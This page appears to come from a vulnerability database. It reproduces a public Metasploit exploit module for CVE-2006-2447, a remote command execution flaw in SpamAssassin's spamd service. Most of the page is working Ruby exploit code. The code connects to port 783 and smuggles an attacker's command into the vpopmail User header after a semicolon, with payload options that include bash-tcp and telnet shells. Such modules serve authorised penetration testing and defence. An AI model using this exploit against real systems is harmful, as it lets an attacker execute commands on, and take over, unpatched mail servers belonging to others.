SpamAssassin spamd Remote Command Execution

2008-07-19T15:40:30
ID MSF:EXPLOIT/UNIX/MISC/SPAMASSASSIN_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-11-08T16:00:24

Description

This module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SpamAssassin spamd Remote Command Execution',
      'Description'    => %q{
          This module exploits a flaw in the SpamAssassin spamd service by specifying
        a malicious vpopmail User header, when running with vpopmail and paranoid
        modes enabled (non-default). Versions prior to v3.1.3 are vulnerable
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-2447' ],
          [ 'OSVDB', '26177' ],
          [ 'BID', '18290' ],
          [ 'URL', 'http://spamassassin.apache.org/advisories/cve-2006-2447.txt' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => 'Jun 06 2006',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(783)
      ])
  end

  def exploit
    connect

    content = Rex::Text.rand_text_alpha(20)

    sploit = "PROCESS SPAMC/1.2\r\n"
    sploit << "Content-length: #{(content.length + 2)}\r\n"
    sploit << "User: ;#{payload.encoded}\r\n\r\n"
    sploit << content + "\r\n\r\n"

    sock.put(sploit)

    handler
    disconnect
  end
end